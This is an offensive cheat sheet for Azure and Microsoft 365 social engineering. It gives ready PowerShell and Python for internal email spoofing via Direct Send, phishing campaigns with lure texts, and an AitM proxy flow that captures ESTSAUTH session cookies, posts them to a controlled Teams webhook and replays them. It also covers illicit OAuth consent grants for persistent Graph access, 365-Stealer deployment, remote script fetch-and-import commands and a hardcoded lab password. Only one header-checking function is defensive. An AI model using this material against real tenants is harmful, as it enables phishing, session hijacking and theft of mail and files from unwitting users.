Azure - Social Engineering

Email Spoofing

FindIngressEmail.ps1 - Test SPAM Filters using Direct Send Endpoint or External Mail Service
iwr https://raw.githubusercontent.com/rvrsh3ll/FindIngressEmail/main/FindIngressEmail.ps1 -Outfile FindIngressEmail.ps1
ipmo .\FindIngressEmail.ps1

# Need an HTML Template
iwr https://raw.githubusercontent.com/MelloSec/PhirstPhish/main/Templates/sharepoint.htm -Outfile sharepoint.html

# Create a list of From addresses to spoof, one per line (e.g. payroll@$domain, it-support@$domain)
code fromEmails.txt

# Spoof an internal address using Direct Send: <domain>.mail.protection.outlook.com accepts
# unauthenticated mail for the tenant's own recipients, so From can be any address in $domain
$domain = ""
$target = ""
Invoke-FindIngressEmail -SMTPServer "$domain.mail.protection.outlook.com" -Subject "A Confidential Document has been shared with you." -BodyFile ./sharepoint.html -FromFile ./fromEmails.txt -Delay 5 -RetryDelay 35 -Verbose -ToEmail $target

# Spoof Using Mailgun
$domain = ""
$target = ""
$SMTPDomain = ""
Invoke-FindIngressEmail -SMTPServer smtp.mailgun.org -Subject "A Confidential Document has been shared with you." -BodyFile ./sharepoint.html -FromFile ./fromEmails.txt -EmailSmtpUser "postmaster@$SMTPDomain" -EmailSmtpPass "SMTPPass" -Delay 5 -RetryDelay 35 -Verbose -ToEmail "$target@$domain"
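Both sides of the Direct Send trick above, as an added example in Python (not part of FindIngressEmail or PhirstPhish): the message an attacker hands to the tenant's MX with an internal From, and the header check a defender runs on mail that arrived that way. The domains, IPs and Authentication-Results values are constructed; the legitimate intra-tenant sample is there because such mail also shows dkim=none/dmarc=none, so only outright failures are treated as spoofing indicators.

```python
"""Direct Send spoofing, attacker and defender side. Added example; the
tenant name, IPs and header values below are constructed for illustration."""
import re
import smtplib
from email.message import EmailMessage
from email.parser import HeaderParser
from email.utils import parseaddr


def build_direct_send_message(from_addr, to_addr, subject, html_body):
    """Envelope and header From are an address in the tenant's own domain.
    Direct Send does not authenticate the submitter, only that the recipient
    belongs to the tenant. html_body is the lure (e.g. sharepoint.html)."""
    msg = EmailMessage()
    msg["From"] = from_addr
    msg["To"] = to_addr
    msg["Subject"] = subject
    msg.set_content("Open this message in an HTML-capable client.")
    msg.add_alternative(html_body, subtype="html")
    return msg


def send_direct(msg, tenant_domain):
    """Hand the message to the tenant's MX host over STARTTLS, no credentials.
    Needs network; not exercised offline."""
    with smtplib.SMTP(f"{tenant_domain}.mail.protection.outlook.com", 25) as smtp:
        smtp.starttls()
        smtp.send_message(msg)


_AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc|compauth)=(\w+)")
_SPF_BAD = {"fail", "softfail", "temperror", "permerror"}


def direct_send_indicators(raw_headers, internal_domains):
    """Reasons a message with an internal From looks like unauthenticated
    Direct Send. Genuine intra-tenant mail shows spf=pass and compauth=pass
    (dkim/dmarc are typically 'none' there), so only failures are flagged."""
    hdr = HeaderParser().parsestr(raw_headers, headersonly=True)
    from_domain = parseaddr(hdr.get("From", ""))[1].rpartition("@")[2].lower()
    if from_domain not in {d.lower() for d in internal_domains}:
        return []  # external From domains are judged by their own DMARC policy
    results = dict(_AUTH_RESULT.findall(hdr.get("Authentication-Results", "")))
    findings = []
    if results.get("spf") in _SPF_BAD:
        findings.append(f"spf={results['spf']} for an internal From domain")
    if results.get("dmarc") == "fail":
        findings.append("dmarc=fail on the internal From domain")
    if results.get("compauth") == "fail":
        findings.append("composite authentication failed (compauth=fail)")
    return findings


# Constructed headers: delivered via Direct Send with a spoofed internal From.
SPOOFED = """\
Received: from relay.attacker.example (203.0.113.5) by
 BN8NAM11FT001.mail.protection.outlook.com (10.13.176.44) with Microsoft SMTP
 Server (version=TLS1_2) id 15.20.1234.5
Authentication-Results: spf=fail (sender IP is 203.0.113.5)
 smtp.mailfrom=corpomax.com; dkim=none (message not signed)
 header.d=none;dmarc=fail action=oreject header.from=corpomax.com;compauth=fail
 reason=000
From: payroll@corpomax.com
To: accountant@corpomax.com
Subject: A Confidential Document has been shared with you.

"""

# Constructed headers: genuine intra-tenant mail, which also has dkim/dmarc none.
INTERNAL_OK = """\
Authentication-Results: spf=pass (sender IP is 40.107.0.1)
 smtp.mailfrom=corpomax.com; dkim=none (message not signed)
 header.d=none;dmarc=none action=none header.from=corpomax.com;compauth=pass
 reason=109
From: payroll@corpomax.com
To: accountant@corpomax.com
Subject: Payroll calendar

"""

if __name__ == "__main__":
    for reason in direct_send_indicators(SPOOFED, {"corpomax.com"}):
        print("SPOOFED:", reason)
    print("INTERNAL_OK:", direct_send_indicators(INTERNAL_OK, {"corpomax.com"}))
```

The defender-side function is the check to wire into a mail-flow rule or a SIEM parser: an internal From domain combined with spf=fail, dmarc=fail or compauth=fail is the signature of Direct Send abuse, and rejecting Direct Send at the tenant (or requiring the tenant's own connectors) removes the ingress entirely.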

Device Code Phishing

Tools:

Adding MFA App:

PhirstPhish - Account Take-Over, Internal Phish, OAuth Persistence, Pillage Outlook/Teams

Recon - AzureHound, AzureAD Module, AADInternals Recon Modules
git clone https://github.com/mellosec/PhirstPhish
cd PhirstPhish 

$targetUser = "accountant@corpomax.com"
$firstUser = "payroll@corpomax.com"
$messageContent = "Hey guys, <p> do you have any idea what this is? We need to pay it really soon, but we're having trouble accounting for it: https://collections.azurewebsites.net/invoice </p>  <p> Sincerely Yours.</p>"
$subject = "Invoice #3389 for Professional Services "
$template = "sharepoint"

.\wrapper.ps1 -targetUser $targetUser -firstUser $firstUser -messageContent $messageContent -subject $subject -template $template -azurehound -recon -azuread -install
# Same campaign, with Graph-based recon and the persistence module instead of AzureHound/AzureAD recon:
.\wrapper.ps1 -targetUser $targetUser -firstUser $firstUser -messageContent $messageContent -subject $subject -template $template -GraphRecon -persistence
Phishing Only - Bypass Modules
$targetUser = "admin@corpomax.com"
$firstUser = "newemployee@corpomax.com"
$messageContent = "Hey guys, <p> the client is asking us to install an addin, something to do with the 'period net' framework and PDFs, sounds gross, haha. Can you take a look and see if we can get it installed? They're really breathing down our necks https://pdfutil.azurewebsites.net/addin </p> <p> Thanks guys you're the unsung heroes of CorpoMax, they should pay you more! </p> <p> Sincerely Yours.</p>"
$subject = "Software for Project Management"
$template = "chatgpt"

.\wrapper.ps1 -targetUser $targetUser -firstUser $firstUser -messageContent $messageContent -subject $subject -template $template

AitM Phishing

Coldworker.ps1 - API Client for the AitM Solution

Sends the lure with an Outlook access token through a serverless Azure Function. The function proxies requests for login.microsoftonline.com and forwards the captured ESTSAUTH/ESTSAUTHPERSISTENT session cookies to a Teams webhook we control.

Interactive - Get/set tokens, campaign code and send from Menu:
.\Coldworker.ps1
Script Send - Script with splatting:
# Define the parameters in a hashtable
$target = "rmattingly@anchorconst.com"
$params = @{
    Direct = $true
    campaignId = "86753"
    templateId = "officesecurity"
    templateData = "https://bigdawgarmada.net/verify"
    recipient = "$target"
    subject = "Urgent: Action Required for Your Account"
    accessToken = "$access"
    baseUrl = "https://clickme.azurewebsites.net"
}

# Pass the hashtable using splatting
.\Coldworker.ps1 @params
Campaign - Script Send to a target list, with up to $delay minutes between messages:
# Define the parameters in a hashtable
$target = ".\emails.txt"
$delay = "3"
$params = @{
    DirectCampaign = $true
    campaignId = "86753"
    templateId = "officesecurity"
    templateData = "https://bigdawgarmada.net/verify"
    emailListPath = "$target"
    maxDelayMinutes = "$delay"
    subject = "Urgent: Action Required for Your Account"
    accessToken = "$access"
    baseUrl = "https://clickme.azurewebsites.net"
}

# Pass the hashtable using splatting
.\Coldworker.ps1 @params
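The capture step the Azure Function performs once the victim signs in through the proxy, as an added example in Python (not Coldworker's own code): pull the Entra session cookies out of the proxied Set-Cookie headers, build the Teams incoming-webhook payload, and rebuild a Cookie header for replaying the session. The Set-Cookie sample is constructed and the cookie values are shortened placeholders; the webhook URL and function names are this example's, not the tool's.

```python
"""AitM cookie capture and replay. Added example with constructed data."""
import json
import urllib.request
from http.cookies import SimpleCookie

# Cookies that carry the Entra sign-in session; ESTSAUTHPERSISTENT is the
# "stay signed in" token and outlives ESTSAUTH.
SESSION_COOKIES = ("ESTSAUTH", "ESTSAUTHPERSISTENT", "ESTSAUTHLIGHT")


def extract_session_cookies(set_cookie_headers):
    """set_cookie_headers: every Set-Cookie value the proxy saw on responses
    from login.microsoftonline.com during the sign-in. Later values win, so a
    post-MFA refresh of ESTSAUTH replaces the pre-MFA one."""
    found = {}
    for raw in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(raw)
        for name, morsel in jar.items():
            if name in SESSION_COOKIES and morsel.value:
                found[name] = morsel.value
    return found


def teams_payload(victim, campaign_id, cookies):
    """MessageCard body for a Teams incoming webhook, one fact per cookie."""
    facts = [{"name": n, "value": v} for n, v in cookies.items()]
    return {
        "@type": "MessageCard",
        "@context": "https://schema.org/extensions",
        "summary": f"session captured: {victim}",
        "sections": [{"activityTitle": f"Campaign {campaign_id}: {victim}", "facts": facts}],
    }


def post_to_webhook(webhook_url, payload):
    """POST the card to the webhook. Needs network; not exercised offline."""
    req = urllib.request.Request(
        webhook_url,
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status


def replay_cookie_header(cookies):
    """Cookie header to present to login.microsoftonline.com from our own
    browser or script; the session is what is replayed, no password or MFA."""
    return "; ".join(f"{n}={cookies[n]}" for n in SESSION_COOKIES if n in cookies)


# Constructed Set-Cookie values as a proxied sign-in would emit them (shortened).
SAMPLE_SET_COOKIE = [
    "buid=0.AXoAbuid; path=/; secure; httponly",
    "ESTSAUTH=0.AXoAabc123; domain=login.microsoftonline.com; path=/; secure; httponly",
    "ESTSAUTHPERSISTENT=0.AXoAdef456; domain=login.microsoftonline.com; path=/; secure; httponly",
    "ESTSAUTH=0.AXoAghi789; domain=login.microsoftonline.com; path=/; secure; httponly",
]

if __name__ == "__main__":
    captured = extract_session_cookies(SAMPLE_SET_COOKIE)
    print(json.dumps(teams_payload("rmattingly@anchorconst.com", "86753", captured), indent=2))
    print(replay_cookie_header(captured))
```

Only the final value of each cookie is kept because Entra reissues ESTSAUTH after the MFA step; forwarding the first one gives the operator a pre-MFA session that is not worth replaying.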

If you can register an OAuth application, or update the credentials on an existing application, you can use that application to phish for access tokens at the least, and for delegated permissions if the tenant is configured to allow users to consent to apps. The current default is to allow user consent only for apps from verified publishers requesting low-risk permissions, but the setting ranges from allowing consent to any app to disabling user consent entirely, with an admin consent workflow through which users request approval. Under certain conditions these apps can also be consented to on behalf of the whole tenant.

Starting in November 2020, end-users will no longer be able to grant consent to most newly registered multi-tenant apps without verified publishers if risk-based step-up consent is enabled. This will apply to apps that are registered after November 8th 2020, use OAuth2.0 to request permissions beyond basic sign-in and read user profile, and request consent from users in different tenants than the one the app is registered in. A warning will be displayed on the consent screen informing users that these apps are risky and are from unverified publishers.

In an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.


One of the best articles on the subject, and one of the very few to underline the limitations Microsoft has implemented: https://www.riskinsight-wavestone.com/en/2023/03/illicit-consent-grant-attacks-targeting-azure-and-office-365-still-a-threat/

Tools:

Resources:

Configure Application
Create Client Secrets
  1. Click on Certificates & secrets
  2. Click on New client secret then enter the Description and click on Add.
  3. Save the secret’s value somewhere in a safe place.
Add API Permissions
  1. Click on API permissions
  2. Click Add a permission
  3. Click on Microsoft Graph
  4. Click on Delegated permissions
  5. Search for and select the permissions below, then click on Add permissions (which ones to request depends on what we want from the victim)
    1. Contacts.Read
    2. Mail.Read
    3. Notes.Read.All
    4. MailboxSettings.ReadWrite
    5. Files.ReadWrite.All
    6. Mail.Send
    7. User.ReadBasic.All
# Check whether users in the tenant may consent at all: an empty list means user consent is disabled,
# ManagePermissionGrantsForSelf.microsoft-user-default-legacy allows any app,
# ManagePermissionGrantsForSelf.microsoft-user-default-low allows only verified publishers / low-risk permissions
Import-Module AzureADPreview
$passwd = ConvertTo-SecureString "V3ryH4rdt0Cr4ckN0OneC@nGu355ForT3stUs3r" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("test@defcorphq.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds
(Get-AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole

# GraphRunner: register a backdoor app with a compromised user's tokens ($tokens from Get-GraphTokens),
# then run the consent flow against it. "op backdoor" is GraphRunner's preset scope set; $low is a
# minimal alternative for tenants where users may only consent to low-risk permissions.
$AppName = Read-Host "AppName"
$ReplyUrl = Read-Host "ReplyUrl"
$low = "openid profile offline_access email User.Read User.ReadBasic.All Mail.Read"
$Scope = "op backdoor"
Invoke-InjectOAuthApp -AppName $AppName -ReplyUrl $ReplyUrl -Scope $Scope -Tokens $tokens *> .\PersistenceApp.json
$ClientId = Read-Host "ClientId"
$ClientSecret = Read-Host "ClientSecret"
$RedirectUri = $ReplyUrl
Invoke-AutoOAuthFlow -ClientId $ClientId -ClientSecret $ClientSecret -RedirectUri $RedirectUri -Scope $Scope
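The consent flow the app registration above is built for, as an added example in Python (not GraphRunner's or 365-Stealer's code): the authorize URL the victim is lured to, validation of the redirect that carries the authorization code, the token request that turns the code into Graph access, and a mapping of the PermissionGrantPolicyIds returned by the Get-AzureADMSAuthorizationPolicy check onto the portal's user-consent setting. The client ID, secret and redirect URI are placeholders; the scope list is the delegated permissions from the registration steps plus offline_access for a refresh token.

```python
"""Illicit consent grant mechanics. Added example; identifiers are placeholders."""
import json
import secrets
import urllib.request
from urllib.parse import parse_qs, urlencode, urlparse

AUTHORITY = "https://login.microsoftonline.com"

# Delegated Graph scopes from the registration above. offline_access yields a
# refresh token, so access outlives the victim's browser session.
SCOPES = [
    "openid", "profile", "offline_access", "email",
    "User.Read", "User.ReadBasic.All", "Contacts.Read", "Mail.Read",
    "Notes.Read.All", "MailboxSettings.ReadWrite", "Files.ReadWrite.All", "Mail.Send",
]

# Built-in permission grant policy IDs behind the user-consent setting.
POLICY_LEGACY = "ManagePermissionGrantsForSelf.microsoft-user-default-legacy"
POLICY_LOW = "ManagePermissionGrantsForSelf.microsoft-user-default-low"


def user_consent_setting(policy_ids):
    """Interpret PermissionGrantPolicyIdsAssignedToDefaultUserRole."""
    ids = set(policy_ids or [])
    if POLICY_LEGACY in ids:
        return "all-apps"                     # users may consent to any app: full scope list works
    if POLICY_LOW in ids:
        return "verified-publishers-low-risk"  # only low-risk scopes from verified publishers
    if not ids:
        return "disabled"                      # user consent off; admin consent workflow only
    return "custom"


def build_consent_url(client_id, redirect_uri, scopes=SCOPES, state=None, tenant="common"):
    """Authorize URL for the lure. state ties the later redirect to this URL."""
    state = state or secrets.token_urlsafe(16)
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "response_mode": "query",
        "scope": " ".join(scopes),
        "state": state,
        "prompt": "consent",  # always show the consent screen, even if seen before
    }
    return f"{AUTHORITY}/{tenant}/oauth2/v2.0/authorize?{urlencode(params)}", state


def code_from_redirect(redirect_url, expected_state):
    """Extract the authorization code from the victim's redirect to our ReplyUrl."""
    query = parse_qs(urlparse(redirect_url).query)
    if query.get("state", [None])[0] != expected_state:
        raise ValueError("state mismatch: redirect not tied to our consent URL")
    if "error" in query:
        desc = query.get("error_description", [""])[0]
        raise ValueError(f"consent failed: {query['error'][0]} {desc}".strip())
    return query["code"][0]


def token_request(client_id, client_secret, code, redirect_uri, scopes=SCOPES, tenant="common"):
    """URL and form body for the code-to-token exchange (client secret from the app)."""
    body = {
        "client_id": client_id,
        "client_secret": client_secret,
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": redirect_uri,
        "scope": " ".join(scopes),
    }
    return f"{AUTHORITY}/{tenant}/oauth2/v2.0/token", body


def exchange_code(client_id, client_secret, code, redirect_uri):
    """Perform the exchange; returns the token response (access_token,
    refresh_token, expires_in, scope). Needs network; not exercised offline."""
    url, body = token_request(client_id, client_secret, code, redirect_uri)
    req = urllib.request.Request(url, data=urlencode(body).encode(), method="POST")
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


if __name__ == "__main__":
    url, state = build_consent_url("00000000-0000-0000-0000-000000000001",
                                   "https://example.invalid/cb")  # placeholder app
    print(url)
    print(user_consent_setting([POLICY_LOW]))
```

The refresh token is the persistence: the victim sees one consent screen and the operator keeps Graph access until the grant is revoked (Enterprise applications, Permissions), which is why the scope list should be cut to what the tenant's consent setting will actually let a user approve.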

365-Stealer - Setup

  1. Clone 365-Stealer from https://github.com/AlteredSecurity/365-Stealer

git clone https://github.com/AlteredSecurity/365-Stealer.git

  2. Save the cloned directory in C:\xampp\htdocs\ or at any location from which we can host the PHP application and run Python.
  3. Install the required applications: Python3, and PHP CLI or XAMPP server
  4. Install the required python modules

pip install -r requirements.txt

Enable sqlite3 in Apache
  1. Open the XAMPP control panel, click on Config for Apache and select PHP (php.ini)
  2. Search for ;extension=sqlite3 and remove the leading ; (it marks the line as a comment), then save the file. (File location: C:\xampp\php\php.ini)
  3. Start the Apache server.

Note: 365-Stealer runs on port 443 by default (changeable with the --port flag), so Apache must listen on another port. Change the port in XAMPP to avoid a conflict between the 365-Stealer phishing application and the management portal. Alternatively, serve the portal with the PHP CLI from the "./yourVictims/" directory as shown below.

Enable IP whitelisting for the 365-Stealer management portal

By default whitelisting is enabled and the portal can only be accessed from localhost. We can add a remote IP or disable whitelisting ( $enableIpWhiteList = false; )

365-Stealer
git clone https://github.com/AlteredSecurity/365-Stealer.git
cd 365-Stealer
pip install -r requirements.txt

# Linux: the PHP CLI is enough to serve the management portal from ./yourVictims/
sudo apt install php-cli -y

# Windows: XAMPP hosts the portal; install it and copy the repo under htdocs
choco install -y xampp-80
cd ..
Copy-Item -Recurse -Force .\365-Stealer C:\xampp\htdocs

# Create the app, assign permissions, create the client ID and secret, then store them in the config
python3 ./365-Stealer.py --set-config

# Run the phishing app (port 443 by default, --port to change)
python3 ./365-Stealer.py --run-app

# XAMPP installer for the dashboard on Linux
# https://sourceforge.net/projects/xampp/files/XAMPP%20Linux/8.2.0/xampp-linux-x64-8.2.0-0-installer.run/download